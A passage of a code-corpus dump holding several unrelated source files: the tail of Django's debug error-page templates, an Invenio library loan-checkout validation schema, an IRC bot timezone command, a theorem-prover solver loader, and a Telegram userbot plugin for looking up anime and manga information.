<td>{{ k }}</td>
<td class="code"><pre>{{ v|pprint }}</pre></td>
</tr>
{% endfor %}
</tbody>
</table>
{% else %}
<p>No GET data</p>
{% endif %}
<h3 id="post-info">POST</h3>
{% if filtered_POST_items %}
<table class="req">
<thead>
<tr>
<th>Variable</th>
<th>Value</th>
</tr>
</thead>
<tbody>
{% for k, v in filtered_POST_items %}
<tr>
<td>{{ k }}</td>
<td class="code"><pre>{{ v|pprint }}</pre></td>
</tr>
{% endfor %}
</tbody>
</table>
{% else %}
<p>No POST data</p>
{% endif %}
<h3 id="files-info">FILES</h3>
{% if request.FILES %}
<table class="req">
<thead>
<tr>
<th>Variable</th>
<th>Value</th>
</tr>
</thead>
<tbody>
{% for k, v in request_FILES_items %}
<tr>
<td>{{ k }}</td>
<td class="code"><pre>{{ v|pprint }}</pre></td>
</tr>
{% endfor %}
</tbody>
</table>
{% else %}
<p>No FILES data</p>
{% endif %}
<h3 id="cookie-info">COOKIES</h3>
{% if request.COOKIES %}
<table class="req">
<thead>
<tr>
<th>Variable</th>
<th>Value</th>
</tr>
</thead>
<tbody>
{% for k, v in request_COOKIES_items %}
<tr>
<td>{{ k }}</td>
<td class="code"><pre>{{ v|pprint }}</pre></td>
</tr>
{% endfor %}
</tbody>
</table>
{% else %}
<p>No cookie data</p>
{% endif %}
<h3 id="meta-info">META</h3>
<table class="req">
<thead>
<tr>
<th>Variable</th>
<th>Value</th>
</tr>
</thead>
<tbody>
{% for var in request.META.items|dictsort:0 %}
<tr>
<td>{{ var.0 }}</td>
<td class="code"><pre>{{ var.1|pprint }}</pre></td>
</tr>
{% endfor %}
</tbody>
</table>
{% else %}
<p>Request data not supplied</p>
{% endif %}
<h3 id="settings-info">Settings</h3>
<h4>Using settings module <code>{{ settings.SETTINGS_MODULE }}</code></h4>
<table class="req">
<thead>
<tr>
<th>Setting</th>
<th>Value</th>
</tr>
</thead>
<tbody>
{% for var in settings.items|dictsort:0 %}
<tr>
<td>{{ var.0 }}</td>
<td class="code"><pre>{{ var.1|pprint }}</pre></td>
</tr>
{% endfor %}
</tbody>
</table>
</div>
{% if not is_email %}
<div id="explanation">
<p>
You're seeing this error because you have <code>DEBUG = True</code> in your
Django settings file. Change that to <code>False</code>, and Django will
display a standard page generated by the handler for this status code.
</p>
</div>
{% endif %}
</body>
</html>
""") # NOQA
TECHNICAL_500_TEXT_TEMPLATE = (""""""
"""{% firstof exception_type 'Report' %}{% if request %} at {{ request.path_info }}{% endif %}
{% firstof exception_value 'No exception message supplied' %}
{% if request %}
Request Method: {{ request.META.REQUEST_METHOD }}
Request URL: {{ request.get_raw_uri }}{% endif %}
Django Version: {{ django_version_info }}
Python Executable: {{ sys_executable }}
Python Version: {{ sys_version_info }}
Python Path: {{ sys_path }}
Server time: {{server_time|date:"r"}}
Installed Applications:
{{ settings.INSTALLED_APPS|pprint }}
Installed Middleware:
{% if settings.MIDDLEWARE is not None %}{{ settings.MIDDLEWARE|pprint }}"""
"""{% else %}{{ settings.MIDDLEWARE_CLASSES|pprint }}{% endif %}
{% if template_does_not_exist %}Template loader postmortem
{% if postmortem %}Django tried loading these templates, in this order:
{% for entry in postmortem %}
Using engine {{ entry.backend.name }}:
{% if entry.tried %}{% for attempt in entry.tried %}"""
""" * {{ attempt.0.loader_name }}: {{ attempt.0.name }} ({{ attempt.1 }})
{% endfor %}{% else %} This engine did not provide a list of tried templates.
{% endif %}{% endfor %}
{% else %}No templates were found because your 'TEMPLATES' setting is not configured.
{% endif %}
{% endif %}{% if template_info %}
Template error:
In template {{ template_info.name }}, error at line {{ template_info.line }}
{{ template_info.message }}
{% for source_line in template_info.source_lines %}"""
"{% if source_line.0 == template_info.line %}"
" {{ source_line.0 }} : {{ template_info.before }} {{ template_info.during }} {{ template_info.after }}"
"{% else %}"
" {{ source_line.0 }} : {{ source_line.1 }}"
"""{% endif %}{% endfor %}{% endif %}{% if frames %}
Traceback:"""
"{% for frame in frames %}"
"{% ifchanged frame.exc_cause %}"
" {% if frame.exc_cause %}" """
{% if frame.exc_cause_explicit %}
The above exception ({{ frame.exc_cause }}) was the direct cause of the following exception:
{% else %}
During handling of the above exception ({{ frame.exc_cause }}), another exception occurred:
{% endif %}
{% endif %}
{% endifchanged %}
File "{{ frame.filename }}" in {{ frame.function }}
{% if frame.context_line %} {{ frame.lineno }}. {{ frame.context_line }}{% endif %}
{% endfor %}
{% if exception_type %}Exception Type: {{ exception_type }}{% if request %} at {{ request.path_info }}{% endif %}
{% if exception_value %}Exception Value: {{ exception_value }}{% endif %}{% endif %}{% endif %}
{% if request %}Request information:
{% if request.user %}USER: {{ request.user }}{% endif %}
GET:{% for k, v in request_GET_items %}
{{ k }} = {{ v|stringformat:"r" }}{% empty %} No GET data{% endfor %}
POST:{% for k, v in filtered_POST_items %}
{{ k }} = {{ v|stringformat:"r" }}{% empty %} No POST data{% endfor %}
FILES:{% for k, v in request_FILES_items %}
{{ k }} = {{ v|stringformat:"r" }}{% empty %} No FILES data{% endfor %}
COOKIES:{% for k, v in request_COOKIES_items %}
{{ k }} = {{ v|stringformat:"r" }}{% empty %} No cookie data{% endfor %}
META:{% for k, v in request.META.items|dictsort:0 %}
{{ k }} = {{ v|stringformat:"r" }}{% endfor %}
{% else %}Request data not supplied
{% endif %}
Settings:
Using settings module {{ settings.SETTINGS_MODULE }}{% for k, v in settings.items|dictsort:0 %}
{{ k }} = {{ v|stringformat:"r" }}{% endfor %}
{% if not is_email %}
You're seeing this error because you have DEBUG = True in your
Django settings file. Change that to False, and Django will
display a standard page generated by the handler for this status code.
{% endif %}
""") # NOQA
TECHNICAL_404_TEMPLATE = """
<!DOCTYPE html>
<html lang="en">
<head>
<meta http-equiv="content-type" content="text/html; charset=utf-8">
<title>Page not found at {{ request.path_info|escape }}</title>
<meta name="robots" content="NONE,NOARCHIVE">
<style type="text/css">
html * { padding:0; margin:0; }
body * { padding:10px 20px; }
body * * { padding:0; }
body { font:small sans-serif; background:#eee; }
body>div { border-bottom:1px solid #ddd; }
h1 { font-weight:normal; margin-bottom:.4em; }
h1 span { font-size:60%; color:#666; font-weight:normal; }
table { border:none; border-collapse: collapse; width:100%; }
td, th { vertical-align:top; padding:2px 3px; }
th { width:12em; text-align:right; color:#666; padding-right:.5em; }
#info { background:#f6f6f6; }
#info ol { margin: 0.5em 4em; }
#info ol li { font-family: monospace; }
#summary { background: #ffc; }
#explanation { background:#eee; border-bottom: 0px none; }
</style>
</head>
<body>
<div id="summary">
<h1>Page not found <span>(404)</span></h1>
<table class="meta">
<tr>
<th>Request Method:</th>
<td>{{ request.META.REQUEST_METHOD }}</td>
</tr>
<tr>
<th>Request URL:</th>
<td>{{ request.build_absolute_uri|escape }}</td>
</tr>
{% if raising_view_name %}
<tr>
<th>Raised by:</th>
<td>{{ raising_view_name }}</td>
</tr>
{% endif %}
</table>
</div>
<div id="info">
{% if urlpatterns %}
<p>
Using the URLconf defined in <code>{{ urlconf }}</code>,
Django tried these URL patterns, in this order:
</p>
<ol>
{% for pattern in urlpatterns %}
<li>
{% for pat in pattern %}
{{ pat.regex.pattern }}
{% if forloop.last and pat.name %}[name='{{ pat.name }}']{% endif %}
{% endfor %}
</li>
{% endfor %}
</ol>
<p>
{% if request_path %}
The current path, <code>{{ request_path|escape }}</code>,{% else %}
The empty path{% endif %} didn't match any of these.
</p>
{% else %}
<p>{{ reason }}</p>
{% endif %}
</div>
<div id="explanation">
<p>
You're seeing this error because you have <code>DEBUG = True</code> in
your Django settings file. Change that to <code>False</code>, and Django
will display a standard 404 page.
</p>
</div>
</body>
</html>
"""
DEFAULT_URLCONF_TEMPLATE = """
<!DOCTYPE html>
<html lang="en"><head>
<meta http-equiv="content-type" content="text/html; charset=utf-8">
<meta name="robots" content="NONE,NOARCHIVE"><title>{{ title }}</title>
<style type="text/css">
html * { padding:0; margin:0; }
body * { padding:10px 20px; }
body * * { padding:0; }
body { font:small sans-serif; }
body>div { border-bottom:1px solid #ddd; }
h1 { font-weight:normal; }
h2 { margin-bottom:.8em; }
h2 span { font-size:80%; color:#666; font-weight:normal; }
h3 { margin:1em 0 .5em 0; }
h4 { margin:0 0 .5em 0; font-weight: normal; }
table { border:1px solid #ccc; border-collapse: collapse; width:100%; background:white; }
tbody td, tbody th { vertical-align:top; padding:2px 3px; }
thead th {
padding:1px 6px 1px 3px; background:#fefefe; text-align:left;
font-weight:normal; font-size:11px; border:1px solid #ddd;
}
tbody th { width:12em; text-align:right; color:#666; padding-right:.5em; }
#summary { background: #e0ebff; }
#summary h2 { font-weight: normal; color: #666; }
#explanation { background:#eee; }
#instructions { background:#f6f6f6; }
#summary table { border:none; background:transparent; }
</style>
</head>
<body>
<div id="summary">
<h1>{{ heading }}</h1>
<h2>{{ subheading }}</h2>
</div>
<div id="instructions">
<p>
{{ instructions|safe }}
</p>
</div>
<div id="explanation">
<p>
{{ explanation|safe }}
</p>
</div>
</body></html>
"""
|
the-stack_0_25198
|
# -*- coding: utf-8 -*-
#
# Copyright (C) 2019 CERN.
#
# invenio-app-ils is free software; you can redistribute it and/or modify
# it under the terms of the MIT License; see LICENSE file for more details.
"""Invenio App ILS circulation Loan Checkout loader JSON schema."""
import arrow
from flask import current_app
from flask_babelex import lazy_gettext as _
from invenio_circulation.records.loaders.schemas.json import DateString, \
LoanItemPIDSchemaV1
from marshmallow import ValidationError, fields, post_load, validates
from invenio_app_ils.permissions import check_permission
from .base import LoanBaseSchemaV1
class LoanCheckoutSchemaV1(LoanBaseSchemaV1):
"""Loan checkout schema."""
item_pid = fields.Nested(LoanItemPIDSchemaV1, required=True)
start_date = DateString()
end_date = DateString()
force = fields.Bool(missing=False)
@validates("force")
def validate_force(self, value, **kwargs):
"""Validate that only librarian can perform a force checkout."""
if value:
# extra permission for force-checkout
permission = current_app.config["ILS_VIEWS_PERMISSIONS_FACTORY"](
"circulation-loan-force-checkout"
)
check_permission(permission)
@post_load()
def postload_checks(self, data, **kwargs):
"""Validate dates values."""
if "end_date" in data and "start_date" not in data:
raise ValidationError(
_("Start date is required when end date provided."),
field_names=["start_date", "end_date"],
)
if "start_date" in data and "end_date" in data:
start = arrow.get(data["start_date"]).date()
end = arrow.get(data["end_date"]).date()
if end < start:
raise ValidationError(
_("The loan end date cannot be before the start date."),
field_names=["start_date", "end_date"],
)
return data
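# Hedged usage sketch (payload values are made up): loading a checkout payload
# through this schema exercises the date checks in postload_checks above; an
# end_date without a start_date, or an end_date before the start_date, raises
# marshmallow.ValidationError.
#
#     schema = LoanCheckoutSchemaV1()
#     loan = schema.load({
#         "item_pid": {"type": "pitmid", "value": "123"},
#         "start_date": "2019-01-01",
#         "end_date": "2019-01-15",
#     })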
|
the-stack_0_25200
|
from datetime import datetime
import pytz
from pytz.exceptions import UnknownTimeZoneError
from cardinal.decorators import command, help
TIME_FORMAT = '%b %d, %I:%M:%S %p UTC%z'
class TimezonePlugin:
@command(['time'])
@help("Returns the current time in a given time zone or GMT offset.")
@help("Syntax: time <GMT offset or timezone>")
def get_time(self, cardinal, user, channel, msg):
utc = pytz.utc
now = datetime.now(utc)
try:
tz_input = msg.split(' ', 1)[1].strip()
except IndexError:
# no timezone specified, default to UTC
return cardinal.sendMsg(channel, now.strftime(TIME_FORMAT))
# handle common offset formats
if (tz_input.startswith('UTC') or tz_input.startswith('GMT')) and \
len(tz_input) > 3 and tz_input[3] in ('+', '-'):
tz_input = tz_input[3:]
offset = None
try:
offset = int(tz_input)
except ValueError:
pass
if offset is not None:
try:
if offset < 0:
                    # pytz's Etc/GMT zones use inverted signs: Etc/GMT+4 is
                    # UTC-4 (US east coast), while UTC+4 must be requested
                    # as Etc/GMT-4
user_tz = pytz.timezone('Etc/GMT+{0}'.format(offset * -1))
elif offset > 0:
user_tz = pytz.timezone('Etc/GMT{0}'.format(offset * -1))
else:
user_tz = utc
except UnknownTimeZoneError:
return cardinal.sendMsg(channel, 'Invalid UTC offset')
else:
try:
user_tz = pytz.timezone(tz_input)
except UnknownTimeZoneError:
return cardinal.sendMsg(channel, 'Invalid timezone')
now = user_tz.normalize(now)
cardinal.sendMsg(channel, now.strftime(TIME_FORMAT))
entrypoint = TimezonePlugin
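# Hedged sketch (defined for illustration, never called by the plugin): pytz's
# Etc/GMT zones carry inverted signs, which is why get_time() negates the
# user-supplied offset before the timezone lookup above.
def _etc_gmt_sign_example():
    from datetime import timedelta
    # "Etc/GMT+5" is five hours *behind* UTC.
    offset = pytz.timezone('Etc/GMT+5').utcoffset(datetime(2020, 1, 1))
    assert offset == timedelta(hours=-5)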
|
the-stack_0_25201
|
import pathlib
import os
from importlib.machinery import SourceFileLoader
from .localSolver import LocalSolver
from .systemOnTPTP import SystemOnTPTPSolver
HERE = pathlib.Path(__file__).parent
DEFAULT_SOLVER_PATH = os.path.abspath(HERE / ".." / ".." / "config" / "solvers.py")
class Solvers():
"""
TODO speed this all up by lazy loading of config files.
"""
def __init__(self):
self._localSolver = None
self._systemOnTptpSolver = None
self._isInit = False
    def init(self):
        if self._isInit:
            return
        self.loadDefaultSolvers()
        self._isInit = True
def loadDefaultSolvers(self):
solvers = SourceFileLoader('solvers', DEFAULT_SOLVER_PATH).load_module()
self._localSolver, self._systemOnTptpSolver = loadSolversAsDict(solvers.SOLVERS)
def getLocalSolver(self, name):
return self._localSolver.get(name, None)
def getSystemOnTptpSolver(self, name):
return self._systemOnTptpSolver.get(name, None)
"""
Singleton pattern
"""
_solvers__singelton = Solvers()
def _solvers():
_solvers__singelton.init()
return _solvers__singelton
def loadSolversAsDict(solverDefinitions):
_localSolver = {}
_systemOnTptpSolver = {}
for s in solverDefinitions:
if s['type'] == 'local':
name = s['name']
_localSolver[name] = LocalSolver(
name = name,
prettyName = s.get('pretty-name', None),
version = s.get('version', None),
command = s['command'],
)
else:
name = s['name']
_systemOnTptpSolver[name] = SystemOnTPTPSolver(
name = name,
prettyName = s.get('pretty-name', None),
systemOnTPTPName = s['system-on-tptp-name'],
version = s.get('version', None),
command = s['command'],
)
return _localSolver, _systemOnTptpSolver
def loadSolvers(solverDefinitions, split=False):
_solvers = []
for s in solverDefinitions:
if s['type'] == 'local':
name = s['name']
_solvers.append(LocalSolver(
name = name,
prettyName = s.get('pretty-name', None),
version = s.get('version', None),
command = s['command'],
encoding = s.get('encoding', None),
))
else:
name = s['name']
_solvers.append(SystemOnTPTPSolver(
name = name,
prettyName = s.get('pretty-name', None),
systemOnTPTPName = s['system-on-tptp-name'],
version = s.get('version', None),
command = s['command'],
))
return _solvers
def getLocalSolvers():
return _solvers()._localSolver
def getSystemOnTptpSolvers():
return _solvers()._systemOnTptpSolver
def getLocalSolver(name):
return _solvers().getLocalSolver(name)
def getSystemOnTptpSolver(name):
return _solvers().getSystemOnTptpSolver(name)
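# Hedged illustration (assumed shape, not shipped with this package): a
# config/solvers.py consumed by loadDefaultSolvers() could define SOLVERS
# roughly like this; the keys mirror the lookups in loadSolversAsDict above.
def _example_solver_definitions():
    return [
        {
            'type': 'local',
            'name': 'eprover',
            'pretty-name': 'E',
            'version': '2.4',
            'command': 'eprover --auto %s',
        },
        {
            'type': 'system-on-tptp',
            'name': 'vampire',
            'pretty-name': 'Vampire',
            'system-on-tptp-name': 'Vampire---4.4',
            'command': 'run %s',
        },
    ]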
|
the-stack_0_25202
|
# Copyright (C) 2020 The Raphielscape Company LLC.
#
# Licensed under the Raphielscape Public License, Version 1.d (the "License");
# you may not use this file except in compliance with the License.
#
import asyncio
import html
import json
import re
import textwrap
from io import BytesIO, StringIO
from urllib.parse import quote as urlencode
import aiohttp
import bs4
import jikanpy
import pendulum
import requests
from html_telegraph_poster import TelegraphPoster
from jikanpy import Jikan
from jikanpy.exceptions import APIException
from telethon.errors.rpcerrorlist import FilePartsInvalidError
from telethon.tl.types import (
DocumentAttributeAnimated,
DocumentAttributeFilename,
MessageMediaDocument,
)
from telethon.utils import is_image, is_video
from userbot import CMD_HELP
from userbot.events import register
jikan = Jikan()
# Anime Helper
def getPosterLink(mal):
# grab poster from kitsu
kitsu = getKitsu(mal)
image = requests.get(f"https://kitsu.io/api/edge/anime/{kitsu}").json()
return image["data"]["attributes"]["posterImage"]["original"]
def getKitsu(mal):
# get kitsu id from mal id
link = f"https://kitsu.io/api/edge/mappings?filter[external_site]=myanimelist/anime&filter[external_id]={mal}"
result = requests.get(link).json()["data"][0]["id"]
link = f"https://kitsu.io/api/edge/mappings/{result}/item?fields[anime]=slug"
return requests.get(link).json()["data"]["id"]
def getBannerLink(mal, kitsu_search=True):
# try getting kitsu backdrop
if kitsu_search:
kitsu = getKitsu(mal)
image = f"http://media.kitsu.io/anime/cover_images/{kitsu}/original.jpg"
response = requests.get(image)
if response.status_code == 200:
return image
# try getting anilist banner
query = """
query ($idMal: Int){
Media(idMal: $idMal){
bannerImage
}
}
"""
data = {"query": query, "variables": {"idMal": int(mal)}}
image = requests.post("https://graphql.anilist.co", json=data).json()["data"][
"Media"
]["bannerImage"]
if image:
return image
return getPosterLink(mal)
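# Hedged usage sketch (illustrative MAL id, never called from this module):
# the helpers above resolve artwork with a fallback chain of Kitsu cover
# image -> AniList banner -> Kitsu poster.
#
#     banner = getBannerLink(1)  # MAL id 1 (Cowboy Bebop)
#     poster = getPosterLink(1)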
def get_anime_manga(mal_id, search_type, _user_id):
jikan = jikanpy.jikan.Jikan()
if search_type == "anime_anime":
result = jikan.anime(mal_id)
trailer = result["trailer_url"]
if trailer:
LOL = f"<a href='{trailer}'>Cuplikan</a>"
else:
LOL = "<code>Tidak ada cuplikan yang tersedia</code>"
image = getBannerLink(mal_id)
studio_string = ", ".join(
studio_info["name"] for studio_info in result["studios"]
)
producer_string = ", ".join(
producer_info["name"] for producer_info in result["producers"]
)
elif search_type == "anime_manga":
result = jikan.manga(mal_id)
image = result["image_url"]
caption = f"📺 <a href='{result['url']}'>{result['title']}</a>"
if result["title_japanese"]:
caption += f" ({result['title_japanese']})\n"
else:
caption += "\n"
alternative_names = []
if result["title_english"] is not None:
alternative_names.append(result["title_english"])
alternative_names.extend(result["title_synonyms"])
if alternative_names:
alternative_names_string = ", ".join(alternative_names)
caption += f"\n<b>Juga dikenal sebagai</b> : <code>{alternative_names_string}</code>"
genre_string = ", ".join(genre_info["name"] for genre_info in result["genres"])
if result["synopsis"] is not None:
synopsis = result["synopsis"].split(" ", 60)
try:
synopsis.pop(60)
except IndexError:
pass
synopsis_string = " ".join(synopsis) + "..."
else:
synopsis_string = "Tidak diketahui"
for entity in result:
if result[entity] is None:
result[entity] = "Tidak diketahui"
if search_type == "anime_anime":
caption += textwrap.dedent(
f"""
🆎 <b>Tipe</b> : <code>{result['type']}</code>
📡 <b>Status</b> : <code>{result['status']}</code>
🎙️ <b>Ditayangkan</b> : <code>{result['aired']['string']}</code>
🔢 <b>Episode</b> : <code>{result['episodes']}</code>
💯 <b>Skor</b> : <code>{result['score']}</code>
🌐 <b>Perdana</b> : <code>{result['premiered']}</code>
⌛ <b>Durasi</b> : <code>{result['duration']}</code>
🎭 <b>Genre</b> : <code>{genre_string}</code>
🎙️ <b>Studio</b> : <code>{studio_string}</code>
💸 <b>Produser</b> : <code>{producer_string}</code>
🎬 <b>Cuplikan</b> : {LOL}
📖 <b>Ringkasan</b> : <code>{synopsis_string}</code> <a href='{result['url']}'>baca selengkapnya</a>
"""
)
elif search_type == "anime_manga":
caption += textwrap.dedent(
f"""
🆎 <b>Tipe</b> : <code>{result['type']}</code>
📡 <b>Status</b> : <code>{result['status']}</code>
🔢 <b>Volume</b> : <code>{result['volumes']}</code>
📃 <b>Bagian</b> : <code>{result['chapters']}</code>
💯 <b>Skor</b> : <code>{result['score']}</code>
🎭 <b>Genre</b> : <code>{genre_string}</code>
📖 <b>Ringkasan</b> : <code>{synopsis_string}</code>
"""
)
return caption, image
def get_poster(query):
url_enc_name = query.replace(" ", "+")
# Searching for query list in imdb
page = requests.get(
f"https://www.imdb.com/find?ref_=nv_sr_fn&q={url_enc_name}&s=all"
)
soup = bs4.BeautifulSoup(page.content, "lxml")
odds = soup.findAll("tr", "odd")
# Fetching the first post from search
page_link = "http://www.imdb.com/" + odds[0].findNext("td").findNext("td").a["href"]
page1 = requests.get(page_link)
soup = bs4.BeautifulSoup(page1.content, "lxml")
# Poster Link
image = soup.find("link", attrs={"rel": "image_src"}).get("href", None)
if image is not None:
# img_path = wget.download(image, os.path.join(Config.DOWNLOAD_LOCATION, 'imdb_poster.jpg'))
return image
def post_to_telegraph(anime_title, html_format_content):
post_client = TelegraphPoster(use_api=True)
auth_name = "@GengKapak"
bish = "https://t.me/GengKapak"
post_client.create_api_token(auth_name)
post_page = post_client.post(
title=anime_title, author=auth_name, author_url=bish, text=html_format_content
)
return post_page["url"]
def replace_text(text):
return text.replace('"', "").replace("\\r", "").replace("\\n", "").replace("\\", "")
async def callAPI(search_str):
query = """
query ($id: Int,$search: String) {
Media (id: $id, type: ANIME,search: $search) {
id
title {
romaji
english
}
description (asHtml: false)
startDate{
year
}
episodes
chapters
volumes
season
type
format
status
duration
averageScore
genres
bannerImage
}
}
"""
variables = {"search": search_str}
url = "https://graphql.anilist.co"
response = requests.post(url, json={"query": query, "variables": variables})
return response.text
async def formatJSON(outData):
msg = ""
jsonData = json.loads(outData)
res = list(jsonData.keys())
if "errors" in res:
msg += f"**Kesalahan** : `{jsonData['errors'][0]['message']}`"
else:
jsonData = jsonData["data"]["Media"]
if "bannerImage" in jsonData.keys():
msg += f"[〽️]({jsonData['bannerImage']})"
else:
msg += "〽️"
title = jsonData["title"]["romaji"]
link = f"https://anilist.co/anime/{jsonData['id']}"
msg += f"[{title}]({link})"
msg += f"\n\n**Tipe** : {jsonData['format']}"
msg += "\n**Genre** : "
for g in jsonData["genres"]:
msg += g + " "
msg += f"\n**Status** : {jsonData['status']}"
msg += f"\n**Episode** : {jsonData['episodes']}"
msg += f"\n**Tahun** : {jsonData['startDate']['year']}"
msg += f"\n**Skor** : {jsonData['averageScore']}"
msg += f"\n**Durasi** : {jsonData['duration']} min\n\n"
cat = f"{jsonData['description']}"
msg += " __" + re.sub("<br>", "\n", cat) + "__"
return msg
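# Hedged sketch (not wired to a command): callAPI and formatJSON above are
# meant to be chained from inside an async handler, e.g.
#
#     raw = await callAPI("One Piece")
#     caption = await formatJSON(raw)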
@register(outgoing=True, pattern=r"^\.anilist ?(.*)")
async def anilist(event):
if event.fwd_from:
return
input_str = event.pattern_match.group(1)
result = await callAPI(input_str)
msg = await formatJSON(result)
await event.edit(msg, link_preview=True)
@register(outgoing=True, pattern=r"^\.anime ?(.*)")
async def anime(event):
query = event.pattern_match.group(1)
reply = await event.get_reply_message()
await event.edit("`Mencari Anime...`")
if query:
pass
elif reply:
query = reply.text
else:
await event.edit("`Apa yang harus saya cari?`")
await asyncio.sleep(6)
await event.delete()
return
try:
res = jikan.search("anime", query)
except Exception as err:
await event.edit(f"**Kesalahan** : \n`{err}`")
return
try:
res = res.get("results")[0].get("mal_id") # Grab first result
except APIException:
await event.edit("`Kesalahan saat menghubungkan ke API.\nSilahkan coba lagi!`")
return
if res:
anime = jikan.anime(res)
title = anime.get("title")
japanese = anime.get("title_japanese")
anime.get("title_english")
type = anime.get("type")
duration = anime.get("duration")
synopsis = anime.get("synopsis")
source = anime.get("source")
status = anime.get("status")
episodes = anime.get("episodes")
score = anime.get("score")
rating = anime.get("rating")
genre_lst = anime.get("genres")
genres = ""
for genre in genre_lst:
genres += genre.get("name") + ", "
genres = genres[:-2]
studios = ""
studio_lst = anime.get("studios")
for studio in studio_lst:
studios += studio.get("name") + ", "
studios = studios[:-2]
duration = anime.get("duration")
premiered = anime.get("premiered")
image_url = anime.get("image_url")
trailer = anime.get("trailer_url")
if trailer:
bru = f"<a href='{trailer}'>Cuplikan</a>"
url = anime.get("url")
else:
await event.edit("`Tidak ada hasil yang ditemukan!`")
return
rep = f"<b>{title}</b> - <b>({japanese})</b>\n"
rep += f"<b>Tipe</b> : <code>{type}</code>\n"
rep += f"<b>Sumber</b> : <code>{source}</code>\n"
rep += f"<b>Status</b> : <code>{status}</code>\n"
rep += f"<b>Genre</b> : <code>{genres}</code>\n"
rep += f"<b>Episode</b> : <code>{episodes}</code>\n"
rep += f"<b>Durasi</b> : <code>{duration}</code>\n"
rep += f"<b>Skor</b> : <code>{score}</code>\n"
rep += f"<b>Studio</b> : <code>{studios}</code>\n"
rep += f"<b>Perdana</b> : <code>{premiered}</code>\n"
rep += f"<b>Peringkat</b> : <code>{rating}</code>\n\n"
rep += f"<a href='{image_url}'>\u200c</a>"
rep += f"📖 <b>Ringkasan</b> : <i>{synopsis}</i>\n"
rep += f'<b>Baca selengkapnya</b> : <a href="{url}">Daftar Anime</a>'
await event.edit(rep, parse_mode="HTML", link_preview=False)
@register(outgoing=True, pattern=r"^\.manga ?(.*)")
async def manga(event):
query = event.pattern_match.group(1)
await event.edit("`Mencari Manga...`")
if not query:
await event.edit("`Apa yang harus saya cari?`")
return
res = ""
manga = ""
try:
res = jikan.search("manga", query).get("results")[0].get("mal_id")
except APIException:
await event.edit("`Kesalahan saat menghubungkan ke API.\nSilahkan coba lagi!`")
return ""
if res:
try:
manga = jikan.manga(res)
except APIException:
await event.edit("`Kesalahan saat menghubungkan ke API.\nSilahkan coba lagi!`")
return ""
title = manga.get("title")
japanese = manga.get("title_japanese")
type = manga.get("type")
status = manga.get("status")
score = manga.get("score")
volumes = manga.get("volumes")
chapters = manga.get("chapters")
genre_lst = manga.get("genres")
genres = ""
for genre in genre_lst:
genres += genre.get("name") + ", "
genres = genres[:-2]
synopsis = manga.get("synopsis")
image = manga.get("image_url")
url = manga.get("url")
rep = f"<b>{title}</b> - <b>({japanese})</b>\n"
rep += f"<b>Tipe</b> : <code>{type}</code>\n"
rep += f"<b>Status</b> : <code>{status}</code>\n"
rep += f"<b>Genre</b> : <code>{genres}</code>\n"
rep += f"<b>Skor</b> : <code>{score}</code>\n"
rep += f"<b>Volume</b> : <code>{volumes}</code>\n"
rep += f"<b>Bagian</b> : <code>{chapters}</code>\n\n"
rep += f"<a href='{image}'>\u200c</a>"
rep += f"📖 <b>Ringkasan</b> : <i>{synopsis}</i>\n"
rep += f'<b>Baca selengkapnya</b> : <a href="{url}">Daftar Anime</a>'
await event.edit(rep, parse_mode="HTML", link_preview=False)
@register(outgoing=True, pattern=r"^\.a(kaizoku|kayo) ?(.*)")
async def site_search(event):
message = await event.get_reply_message()
search_query = event.pattern_match.group(2)
site = event.pattern_match.group(1)
if search_query:
pass
elif message:
search_query = message.text
else:
await event.edit("`Apa yang harus saya cari?`")
return
if site == "kaizoku":
search_url = f"https://animekaizoku.com/?s={search_query}"
html_text = requests.get(search_url).text
soup = bs4.BeautifulSoup(html_text, "html.parser")
search_result = soup.find_all("h2", {"class": "post-title"})
if search_result:
result = f"Klik <a href='{search_url}'>disini</a> untuk hasil lainnya dari <b>{html.escape(search_query)}</b> di <b>AnimeKaizoku</b> : \n\n"
for entry in search_result:
post_link = entry.a["href"]
post_name = html.escape(entry.text.strip())
result += f"• <a href='{post_link}'>{post_name}</a>\n"
await event.edit(result, parse_mode="HTML")
else:
result = f"Tidak ada hasil yang ditemukan untuk <b>{html.escape(search_query)}</b> di <b>AnimeKaizoku</b>"
await event.edit(result, parse_mode="HTML")
elif site == "kayo":
search_url = f"https://animekayo.com/?s={search_query}"
html_text = requests.get(search_url).text
soup = bs4.BeautifulSoup(html_text, "html.parser")
search_result = soup.find_all("h2", {"class": "title"})
result = f"Klik <a href='{search_url}'>disini</a> untuk hasil lainnya dari <b>{html.escape(search_query)}</b> di <b>AnimeKayo</b> : \n\n"
for entry in search_result:
if entry.text.strip() == "Nothing Found":
result = f"Tidak ada hasil yang ditemukan untuk <b>{html.escape(search_query)}</b> di <b>AnimeKayo</b>"
break
post_link = entry.a["href"]
post_name = html.escape(entry.text.strip())
result += f"• <a href='{post_link}'>{post_name}</a>\n"
await event.edit(result, parse_mode="HTML")
@register(outgoing=True, pattern=r"^\.char ?(.*)")
async def character(event):
message = await event.get_reply_message()
search_query = event.pattern_match.group(1)
if search_query:
pass
elif message:
search_query = message.text
else:
await event.edit("`Gunakan .char [nama karakter]`")
return
try:
search_result = jikan.search("character", search_query)
except APIException:
await event.edit("`Karakter tidak ditemukan!`")
return
first_mal_id = search_result["results"][0]["mal_id"]
character = jikan.character(first_mal_id)
caption = f"[{character['name']}]({character['url']})"
if character["name_kanji"] != "Japanese":
caption += f" ({character['name_kanji']})\n"
else:
caption += "\n"
if character["nicknames"]:
nicknames_string = ", ".join(character["nicknames"])
caption += f"\n**Nama panggilan** : `{nicknames_string}`"
about = character["about"].split(" ", 60)
try:
about.pop(60)
except IndexError:
pass
about_string = " ".join(about)
mal_url = search_result["results"][0]["url"]
for entity in character:
if character[entity] is None:
character[entity] = "Tidak diketahui"
caption += f"\n🔰**Data Karakter yang Diekstrak**🔰\n\n{about_string}"
caption += f" [Baca selengkapnya...]({mal_url})"
await event.delete()
await event.client.send_file(
event.chat_id,
file=character["image_url"],
caption=replace_text(caption),
reply_to=event,
)
@register(outgoing=True, pattern=r"^\.upcoming ?(.*)")
async def upcoming(message):
rep = "<b>Anime yang akan datang</b>\n\n"
later = jikan.season_later()
anime = later.get("anime")
for new in anime:
name = new.get("title")
url = new.get("url")
rep += f"• <a href='{url}'>{name}</a> \n"
if len(rep) > 1000:
break
await message.edit(rep, parse_mode="html")
@register(outgoing=True, pattern=r"^\.scanime ?(.*)")
async def get_anime(message):
try:
query = message.pattern_match.group(1)
except IndexError:
if message.reply_to_msg_id:
query = await message.get_reply_message().text
else:
await message.reply(
"`Anda tidak memberikan apapun untuk dicari.\nGunakan .scanime [nama anime]`"
)
return
except Exception as err:
await message.edit(f"`Menemukan pengecualian yang tidak diketahui :` \n{err}")
return
